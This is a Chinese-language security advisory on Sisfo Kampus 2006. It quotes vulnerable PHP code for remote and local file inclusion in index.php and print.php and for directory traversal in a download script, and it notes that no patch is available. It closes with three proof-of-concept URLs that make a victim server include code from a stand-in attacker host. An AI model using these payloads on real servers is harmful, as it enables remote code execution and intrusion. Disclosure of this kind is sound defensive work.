Sisfo Kampus是一款系统信息管理系统。
Sisfo Kampus在处理用户请求时存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上以Web进程权限执行任意命令。
Sisfo Kampus的index.php和print.php脚本没有过滤slnt参数的输入,允许攻击者通过包含本地或外部资源的任意文件导致执行任意代码。
index.php中漏洞代码如下:
-------------------------[Line 27]-----------------------------
<?php
if ($exec=='main.php' && file_exists("$themedir/main.php"))
include "$themedir/main.php";
else include $exec;
?>
-------------------------[Line 31]------------------------------
print.php中漏洞代码如下:
-------------------------[Line 15]------------------------------
<?php
include_once "sysfo/sysfo.common.php";
if (isset($_REQUEST['print'])) {
$print = $_REQUEST['print'];
include "$print";
}
else die (DisplayHeader($fmtErrorMsg, $strNoDataTobePrint));
include "disconnectdb.php";
?>
-------------------------[Line 25]-------------------------------
此外,Sisfo Kampus的downloadexcel.php脚本没有正确过滤fn参数的输入,允许攻击者通过目录遍历攻击下载任意文件。
download.php中漏洞代码如下:
-------------------------[Line 1]--------------------------------
<?php
DisplayHeader($fmtPageTitle, $strDownload);
include "lib/file.common.php";
if (isset($_REQUEST['dir'])) $dir = $_REQUEST['dir'];
else $dir = $Download_dir;
if (substr($dir, -1) != '/' && substr($dir, -1) != '\\') $dir = "$dir/";
DisplayDownloadDir($dir);
?>
-------------------------[Line 8]--------------------------------
E. Setio Dewo Sisfo Kampus 2006 (Semarang 3)
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
<a href=“http://www.sisfokampus.net” target=“_blank”>http://www.sisfokampus.net</a>
http://www.victim.com/index.php?exec=http://attacker.com/evilcode.txt?
http://www.victim.com/print.php?print=http://attacker.com/evilcode.txt?
http://www.victim.com/index.php?exec=print&print=http://attacker.com/evilcode.txt?